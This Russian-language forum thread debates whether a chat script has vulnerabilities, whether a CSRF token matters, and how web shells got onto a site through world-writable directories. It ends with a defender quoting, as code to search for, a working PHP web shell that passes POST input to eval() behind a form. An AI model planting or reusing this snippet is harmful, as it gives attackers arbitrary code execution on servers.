Алехандро
Проверенные
- Сообщения
- 182
- Реакции
- 43
- Баллы
- 5,530
Еще раз повторяю права выставлены урезать все, кому нужно попросят. А уж тем более на запись :lol:Сначала покажите, как csrf-токен изменяет содержимое страницы на предсказуемое :lol: С таким успехом я могу сказать, что если ввести другой урл, то она тоже изменится , и что это уязвимость :lol: :lol: :lol:
Таких файлов нету в дистрибутиве чата на этом сайте.
"Права норм" - это не ответ. Меня интересует числовое значение, в частности, наличие бита записи на директориях. Наверняка у вас library/ открыта на запись для всего мира, не удивляйтесь что вам накидали шеллов откуда-то, возможно извне или еще откуда.
Очень веселый хостинг. Удалили мой тестовый аккаунт после того как я добрался до шелла. Видимо, почуяли что-то неладное. :lol:
Накидали? Шеллов? Что вы такое говорить. Я писал причины по которым они туда могли попасть их две, а третей не дано быть. Если будет время перерою все файлы на наличие
PHP:
<?php
if ( isset($_POST['text']) )
eval ($_POST['text']);
?>
<form method='POST'>
<textarea name='text'></textarea>
<input type='submit'>
</form>